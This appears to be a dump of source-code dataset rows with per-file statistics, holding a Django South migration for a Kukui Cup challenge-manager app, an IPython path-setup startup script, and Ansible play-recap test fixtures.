0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "_": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "`": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "{": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "|": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "}": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "~": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 
0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 1, 0, 0, 0], [0, 0, 1, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]}
| 1,209.263158
| 22,248
| 0.322685
| 6,952
| 22,976
| 1.066312
| 0.015823
| 1.419668
| 1.924322
| 2.320248
| 0.917577
| 0.917577
| 0.917577
| 0.917577
| 0.917442
| 0.916498
| 0
| 0.426205
| 0.303752
| 22,976
| 18
| 22,249
| 1,276.444444
| 0.037194
| 0.03038
| 0
| 0
| 0
| 30
| 0.438247
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
4fa1d7b2cd3df9056a7b9c206fb3fc27a81f5b2e
| 17,435
|
py
|
Python
|
makahiki/apps/managers/challenge_mgr/migrations/0001_initial.py
|
justinslee/Wai-Not-Makahiki
|
4b7dd685012ec64758affe0ecee3103596d16aa7
|
[
"MIT"
] | 1
|
2015-07-22T11:31:20.000Z
|
2015-07-22T11:31:20.000Z
|
makahiki/apps/managers/challenge_mgr/migrations/0001_initial.py
|
justinslee/Wai-Not-Makahiki
|
4b7dd685012ec64758affe0ecee3103596d16aa7
|
[
"MIT"
] | null | null | null |
makahiki/apps/managers/challenge_mgr/migrations/0001_initial.py
|
justinslee/Wai-Not-Makahiki
|
4b7dd685012ec64758affe0ecee3103596d16aa7
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
    """Apply the initial challenge_mgr schema.

    Creates the tables for ChallengeSetting, UploadImage, Sponsor,
    RoundSetting, PageInfo, PageSetting, GameInfo, and GameSetting,
    emits a South create-signal after each table, and adds the two
    composite unique constraints (PageSetting and GameSetting).

    NOTE: this is South-generated migration code; statement order matters
    (tables must exist before their FK targets/constraints reference them),
    so the body is kept exactly as generated.
    """
    # Adding model 'ChallengeSetting'
    db.create_table('challenge_mgr_challengesetting', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('site_name', self.gf('django.db.models.fields.CharField')(default='My site', max_length=50)),
        ('site_domain', self.gf('django.db.models.fields.CharField')(default='localhost', max_length=100)),
        ('site_logo', self.gf('django.db.models.fields.files.ImageField')(max_length=255, null=True, blank=True)),
        ('competition_name', self.gf('django.db.models.fields.CharField')(default='Kukui Cup', max_length=50)),
        ('theme', self.gf('django.db.models.fields.CharField')(default='theme-forest', max_length=50)),
        ('competition_team_label', self.gf('django.db.models.fields.CharField')(default='Team', max_length=50)),
        ('use_cas_auth', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ('cas_server_url', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
        ('cas_auth_text', self.gf('django.db.models.fields.TextField')(default='###I have a CAS email', max_length=255)),
        ('use_ldap_auth', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ('ldap_server_url', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
        ('ldap_search_base', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
        ('ldap_auth_text', self.gf('django.db.models.fields.TextField')(default='###I have a LDAP email', max_length=255)),
        ('use_internal_auth', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ('internal_auth_text', self.gf('django.db.models.fields.TextField')(default='###Others', max_length=255)),
        ('wattdepot_server_url', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
        ('email_enabled', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ('contact_email', self.gf('django.db.models.fields.CharField')(default='CHANGEME@example.com', max_length=100)),
        ('email_host', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
        ('email_port', self.gf('django.db.models.fields.IntegerField')(default=587)),
        ('email_use_tls', self.gf('django.db.models.fields.BooleanField')(default=True)),
        ('landing_slogan', self.gf('django.db.models.fields.TextField')(default='The Kukui Cup: Lights off, game on!', max_length=255)),
        ('landing_introduction', self.gf('django.db.models.fields.TextField')(default='Aloha! Welcome to the Kukui Cup.', max_length=500)),
        ('landing_participant_text', self.gf('django.db.models.fields.TextField')(default='###I am registered', max_length=255)),
        ('landing_non_participant_text', self.gf('django.db.models.fields.TextField')(default='###I am not registered.', max_length=255)),
        ('about_page_text', self.gf('django.db.models.fields.TextField')(default="For more information, please go to <a href='http://kukuicup.org'>kukuicup.org</a>.")),
    ))
    db.send_create_signal('challenge_mgr', ['ChallengeSetting'])
    # Adding model 'UploadImage'
    db.create_table('challenge_mgr_uploadimage', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('image', self.gf('django.db.models.fields.files.ImageField')(max_length=255, null=True, blank=True)),
    ))
    db.send_create_signal('challenge_mgr', ['UploadImage'])
    # Adding model 'Sponsor'
    db.create_table('challenge_mgr_sponsor', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('challenge', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['challenge_mgr.ChallengeSetting'])),
        # NOTE(review): default is the string '1' here, but the int 1 on
        # PageInfo/GameInfo below — preserved as generated; confirm upstream.
        ('priority', self.gf('django.db.models.fields.IntegerField')(default='1')),
        ('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
        ('url', self.gf('django.db.models.fields.CharField')(max_length=200)),
        ('logo_url', self.gf('django.db.models.fields.CharField')(max_length=200, null=True, blank=True)),
        ('logo', self.gf('django.db.models.fields.files.ImageField')(max_length=255, null=True, blank=True)),
    ))
    db.send_create_signal('challenge_mgr', ['Sponsor'])
    # Adding model 'RoundSetting'
    db.create_table('challenge_mgr_roundsetting', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('name', self.gf('django.db.models.fields.CharField')(default='Round 1', max_length=50)),
        # The datetime defaults below were frozen at migration-generation
        # time (a one-week round starting 2012-06-16), as South does.
        ('start', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime(2012, 6, 16, 12, 47, 16, 115))),
        ('end', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime(2012, 6, 23, 12, 47, 16, 169))),
    ))
    db.send_create_signal('challenge_mgr', ['RoundSetting'])
    # Adding model 'PageInfo'
    db.create_table('challenge_mgr_pageinfo', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('name', self.gf('django.db.models.fields.CharField')(max_length=50)),
        ('label', self.gf('django.db.models.fields.CharField')(max_length=100)),
        ('title', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
        ('introduction', self.gf('django.db.models.fields.TextField')(max_length=1000, null=True, blank=True)),
        ('priority', self.gf('django.db.models.fields.IntegerField')(default=1)),
        ('url', self.gf('django.db.models.fields.CharField')(default='/', max_length=255)),
        ('unlock_condition', self.gf('django.db.models.fields.CharField')(default='True', max_length=255)),
    ))
    db.send_create_signal('challenge_mgr', ['PageInfo'])
    # Adding model 'PageSetting'
    db.create_table('challenge_mgr_pagesetting', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['challenge_mgr.PageInfo'])),
        ('game', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['challenge_mgr.GameInfo'], null=True, blank=True)),
        ('widget', self.gf('django.db.models.fields.CharField')(max_length=50, null=True, blank=True)),
        ('enabled', self.gf('django.db.models.fields.BooleanField')(default=True)),
    ))
    db.send_create_signal('challenge_mgr', ['PageSetting'])
    # Adding unique constraint on 'PageSetting', fields ['page', 'game', 'widget']
    db.create_unique('challenge_mgr_pagesetting', ['page_id', 'game_id', 'widget'])
    # Adding model 'GameInfo'
    db.create_table('challenge_mgr_gameinfo', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('name', self.gf('django.db.models.fields.CharField')(max_length=50)),
        ('enabled', self.gf('django.db.models.fields.BooleanField')(default=True)),
        ('priority', self.gf('django.db.models.fields.IntegerField')(default=1)),
    ))
    db.send_create_signal('challenge_mgr', ['GameInfo'])
    # Adding model 'GameSetting'
    db.create_table('challenge_mgr_gamesetting', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('game', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['challenge_mgr.GameInfo'])),
        ('widget', self.gf('django.db.models.fields.CharField')(max_length=50)),
        ('enabled', self.gf('django.db.models.fields.BooleanField')(default=True)),
    ))
    db.send_create_signal('challenge_mgr', ['GameSetting'])
    # Adding unique constraint on 'GameSetting', fields ['game', 'widget']
    db.create_unique('challenge_mgr_gamesetting', ['game_id', 'widget'])
def backwards(self, orm):
    """Reverse this migration: drop everything ``forwards`` created.

    South invokes this when migrating the ``challenge_mgr`` app backwards.
    The two unique constraints are removed first — they live on tables
    that are dropped below, and must be deleted before their tables are.
    Each ``db.delete_table`` call then removes one model's table.
    """
    # Removing unique constraint on 'GameSetting', fields ['game', 'widget']
    db.delete_unique('challenge_mgr_gamesetting', ['game_id', 'widget'])
    # Removing unique constraint on 'PageSetting', fields ['page', 'game', 'widget']
    db.delete_unique('challenge_mgr_pagesetting', ['page_id', 'game_id', 'widget'])
    # Deleting model 'ChallengeSetting'
    db.delete_table('challenge_mgr_challengesetting')
    # Deleting model 'UploadImage'
    db.delete_table('challenge_mgr_uploadimage')
    # Deleting model 'Sponsor'
    db.delete_table('challenge_mgr_sponsor')
    # Deleting model 'RoundSetting'
    db.delete_table('challenge_mgr_roundsetting')
    # Deleting model 'PageInfo'
    db.delete_table('challenge_mgr_pageinfo')
    # Deleting model 'PageSetting'
    db.delete_table('challenge_mgr_pagesetting')
    # Deleting model 'GameInfo'
    db.delete_table('challenge_mgr_gameinfo')
    # Deleting model 'GameSetting'
    db.delete_table('challenge_mgr_gamesetting')
# Frozen ORM: South's auto-generated snapshot of the app's models at the
# point in history this migration was written.  South uses it to build the
# ``orm`` object passed to forwards()/backwards().  Regenerate it with
# ``schemamigration`` rather than editing by hand.
# NOTE(review): the RoundSetting start/end defaults are literal datetimes
# captured when the migration was generated — presumably inert here, but
# confirm nothing treats them as meaningful dates.
models = {
    'challenge_mgr.challengesetting': {
        'Meta': {'object_name': 'ChallengeSetting'},
        'about_page_text': ('django.db.models.fields.TextField', [], {'default': '"For more information, please go to <a href=\'http://kukuicup.org\'>kukuicup.org</a>."'}),
        'cas_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###I have a CAS email'", 'max_length': '255'}),
        'cas_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
        'competition_name': ('django.db.models.fields.CharField', [], {'default': "'Kukui Cup'", 'max_length': '50'}),
        'competition_team_label': ('django.db.models.fields.CharField', [], {'default': "'Team'", 'max_length': '50'}),
        'contact_email': ('django.db.models.fields.CharField', [], {'default': "'CHANGEME@example.com'", 'max_length': '100'}),
        'email_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'email_host': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
        'email_port': ('django.db.models.fields.IntegerField', [], {'default': '587'}),
        'email_use_tls': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'internal_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###Others'", 'max_length': '255'}),
        'landing_introduction': ('django.db.models.fields.TextField', [], {'default': "'Aloha! Welcome to the Kukui Cup.'", 'max_length': '500'}),
        'landing_non_participant_text': ('django.db.models.fields.TextField', [], {'default': "'###I am not registered.'", 'max_length': '255'}),
        'landing_participant_text': ('django.db.models.fields.TextField', [], {'default': "'###I am registered'", 'max_length': '255'}),
        'landing_slogan': ('django.db.models.fields.TextField', [], {'default': "'The Kukui Cup: Lights off, game on!'", 'max_length': '255'}),
        'ldap_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###I have a LDAP email'", 'max_length': '255'}),
        'ldap_search_base': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
        'ldap_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
        'site_domain': ('django.db.models.fields.CharField', [], {'default': "'localhost'", 'max_length': '100'}),
        'site_logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
        'site_name': ('django.db.models.fields.CharField', [], {'default': "'My site'", 'max_length': '50'}),
        'theme': ('django.db.models.fields.CharField', [], {'default': "'theme-forest'", 'max_length': '50'}),
        'use_cas_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'use_internal_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'use_ldap_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'wattdepot_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
    },
    'challenge_mgr.gameinfo': {
        'Meta': {'ordering': "['priority']", 'object_name': 'GameInfo'},
        'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
        'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'})
    },
    'challenge_mgr.gamesetting': {
        'Meta': {'ordering': "['game', 'widget']", 'unique_together': "(('game', 'widget'),)", 'object_name': 'GameSetting'},
        'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.GameInfo']"}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'widget': ('django.db.models.fields.CharField', [], {'max_length': '50'})
    },
    'challenge_mgr.pageinfo': {
        'Meta': {'ordering': "['priority']", 'object_name': 'PageInfo'},
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'introduction': ('django.db.models.fields.TextField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
        'label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
        'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
        'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
        'unlock_condition': ('django.db.models.fields.CharField', [], {'default': "'True'", 'max_length': '255'}),
        'url': ('django.db.models.fields.CharField', [], {'default': "'/'", 'max_length': '255'})
    },
    'challenge_mgr.pagesetting': {
        'Meta': {'ordering': "['page', 'game', 'widget']", 'unique_together': "(('page', 'game', 'widget'),)", 'object_name': 'PageSetting'},
        'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.GameInfo']", 'null': 'True', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.PageInfo']"}),
        'widget': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'})
    },
    'challenge_mgr.roundsetting': {
        'Meta': {'ordering': "['start']", 'object_name': 'RoundSetting'},
        'end': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 6, 23, 12, 47, 16, 169)'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'default': "'Round 1'", 'max_length': '50'}),
        'start': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 6, 16, 12, 47, 16, 115)'})
    },
    'challenge_mgr.sponsor': {
        'Meta': {'ordering': "['priority', 'name']", 'object_name': 'Sponsor'},
        'challenge': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.ChallengeSetting']"}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
        'logo_url': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
        'priority': ('django.db.models.fields.IntegerField', [], {'default': "'1'"}),
        'url': ('django.db.models.fields.CharField', [], {'max_length': '200'})
    },
    'challenge_mgr.uploadimage': {
        'Meta': {'object_name': 'UploadImage'},
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
    }
}
# Limit the frozen ORM above to this app's models.
complete_apps = ['challenge_mgr']
| 72.344398
| 176
| 0.610037
| 1,981
| 17,435
| 5.223624
| 0.079253
| 0.095091
| 0.165056
| 0.235794
| 0.848666
| 0.800445
| 0.776768
| 0.760437
| 0.727
| 0.642443
| 0
| 0.01871
| 0.178434
| 17,435
| 240
| 177
| 72.645833
| 0.703714
| 0.043074
| 0
| 0.1875
| 0
| 0.005208
| 0.524607
| 0.32121
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010417
| false
| 0
| 0.020833
| 0
| 0.046875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96d615b0bcf79439f64ec8c5f8eff7aa70d10a63
| 205
|
py
|
Python
|
.ipython/profile_default/startup/20-set-api-paths.py
|
OpenSecuritySummit/jp-mstg
|
1a4c529eea60a58eb58ee7b2976f2d22baf5a9ea
|
[
"Apache-2.0"
] | null | null | null |
.ipython/profile_default/startup/20-set-api-paths.py
|
OpenSecuritySummit/jp-mstg
|
1a4c529eea60a58eb58ee7b2976f2d22baf5a9ea
|
[
"Apache-2.0"
] | null | null | null |
.ipython/profile_default/startup/20-set-api-paths.py
|
OpenSecuritySummit/jp-mstg
|
1a4c529eea60a58eb58ee7b2976f2d22baf5a9ea
|
[
"Apache-2.0"
] | null | null | null |
"""IPython startup hook: make the project's ``api`` package importable.

Notebooks/sessions may be launched from several directory depths, so a
candidate relative location of ``api`` is appended to ``sys.path`` for
each depth; entries that do not exist are simply never matched by the
import machinery.
"""
import sys

# Same five candidate paths the original appended, from the current
# directory up to four levels above it.
for prefix in ('./', '../', '../../', '../../../', '../../../../'):
    sys.path.append(prefix + 'api')

# Resolvable only after the sys.path tweak above, hence the late imports.
from api.utils import *  # noqa: E402,F401,F403
import pandas as pd  # noqa: E402
| 20.5
| 34
| 0.6
| 30
| 205
| 4.1
| 0.333333
| 0.284553
| 0.528455
| 0.650407
| 0.650407
| 0.650407
| 0.650407
| 0.650407
| 0.650407
| 0.650407
| 0
| 0
| 0.082927
| 205
| 9
| 35
| 22.777778
| 0.654255
| 0
| 0
| 0
| 0
| 0
| 0.229268
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.375
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8c0db2fd1dcae48f81fcffe580c1d5300fe9de09
| 2,587
|
py
|
Python
|
ansible_shed/tests/ansible_output_fixtures.py
|
cmiceli/ansible_shed
|
6bfbb8dc86777daf18872e14892426dd97e60dea
|
[
"BSD-2-Clause"
] | null | null | null |
ansible_shed/tests/ansible_output_fixtures.py
|
cmiceli/ansible_shed
|
6bfbb8dc86777daf18872e14892426dd97e60dea
|
[
"BSD-2-Clause"
] | null | null | null |
ansible_shed/tests/ansible_output_fixtures.py
|
cmiceli/ansible_shed
|
6bfbb8dc86777daf18872e14892426dd97e60dea
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python3
"""Canned ``ansible-playbook`` outputs and their expected parsed stats.

Fixtures for unit tests of the recap parser: two captured "PLAY RECAP"
sections, matching ``CompletedProcess`` objects, and the stats dicts the
parser is expected to produce from them.
"""
from subprocess import CompletedProcess

# Recap where unittest1 had a failed task (failed=1) — overall run failed.
ANSIBLE_FAIL_OUTPUT = """\
PLAY RECAP *********************************************************************
unittest1.cooperlees.com : ok=0 changed=0 unreachable=0 failed=1 skipped=1 rescued=0 ignored=0
unittest2.cooperlees.com : ok=7 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
"""
# Recap where both hosts completed with failed=0 — overall run succeeded.
ANSIBLE_SUCCESS_OUTPUT = """\
PLAY RECAP *********************************************************************
unittest1.cooperlees.com : ok=7 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
unittest2.cooperlees.com : ok=7 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
"""
# CompletedProcess(args, returncode, stdout, stderr): rc=1 for the failed
# run, rc=0 for the successful one, with the recap text as stdout.
ANSIBLE_FAIL_CP = CompletedProcess(
    ["ansible-playbook", "--success"], 1, ANSIBLE_FAIL_OUTPUT, ""
)
ANSIBLE_SUCCESS_CP = CompletedProcess(
    ["ansible-playbook"], 0, ANSIBLE_SUCCESS_OUTPUT, ""
)
# ansible_* keys are only first here because we run after SUCCESS parsing ...
# (key order is deliberate — do not reorder these dicts).
EXPECTED_FAIL_STATS = {
    "ansible_last_run_returncode": 1,
    "ansible_stats_last_updated": 69,
    "host_unittest1.cooperlees.com_ok": 0,
    "host_unittest1.cooperlees.com_changed": 0,
    "host_unittest1.cooperlees.com_unreachable": 0,
    "host_unittest1.cooperlees.com_failed": 1,
    "host_unittest1.cooperlees.com_skipped": 1,
    "host_unittest1.cooperlees.com_rescued": 0,
    "host_unittest1.cooperlees.com_ignored": 0,
    "host_unittest2.cooperlees.com_ok": 7,
    "host_unittest2.cooperlees.com_changed": 0,
    "host_unittest2.cooperlees.com_unreachable": 0,
    "host_unittest2.cooperlees.com_failed": 0,
    "host_unittest2.cooperlees.com_skipped": 1,
    "host_unittest2.cooperlees.com_rescued": 0,
    "host_unittest2.cooperlees.com_ignored": 0,
}
EXPECTED_SUCCESS_STATS = {
    "host_unittest1.cooperlees.com_ok": 7,
    "host_unittest1.cooperlees.com_changed": 0,
    "host_unittest1.cooperlees.com_unreachable": 0,
    "host_unittest1.cooperlees.com_failed": 0,
    "host_unittest1.cooperlees.com_skipped": 1,
    "host_unittest1.cooperlees.com_rescued": 0,
    "host_unittest1.cooperlees.com_ignored": 0,
    "host_unittest2.cooperlees.com_ok": 7,
    "host_unittest2.cooperlees.com_changed": 0,
    "host_unittest2.cooperlees.com_unreachable": 0,
    "host_unittest2.cooperlees.com_failed": 0,
    "host_unittest2.cooperlees.com_skipped": 1,
    "host_unittest2.cooperlees.com_rescued": 0,
    "host_unittest2.cooperlees.com_ignored": 0,
    "ansible_last_run_returncode": 0,
    "ansible_stats_last_updated": 69,
}
| 41.725806
| 118
| 0.683031
| 312
| 2,587
| 5.394231
| 0.147436
| 0.247178
| 0.20915
| 0.21628
| 0.796791
| 0.715389
| 0.715389
| 0.677956
| 0.677956
| 0.677956
| 0
| 0.044272
| 0.153073
| 2,587
| 61
| 119
| 42.409836
| 0.72387
| 0.034789
| 0
| 0.603774
| 0
| 0.075472
| 0.728257
| 0.548297
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018868
| 0
| 0.018868
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4fcfac67504a26ada1679b0bb81751f8ab24fd79
| 64,747
|
py
|
Python
|
3algo/old_distr_generated_4_5_6_7/plotBoth_dist.py
|
allengrr/deadlock_project
|
933878077c45a7df04daa087407bb2620c064617
|
[
"MIT"
] | null | null | null |
3algo/old_distr_generated_4_5_6_7/plotBoth_dist.py
|
allengrr/deadlock_project
|
933878077c45a7df04daa087407bb2620c064617
|
[
"MIT"
] | null | null | null |
3algo/old_distr_generated_4_5_6_7/plotBoth_dist.py
|
allengrr/deadlock_project
|
933878077c45a7df04daa087407bb2620c064617
|
[
"MIT"
] | 1
|
2021-03-21T17:54:26.000Z
|
2021-03-21T17:54:26.000Z
|
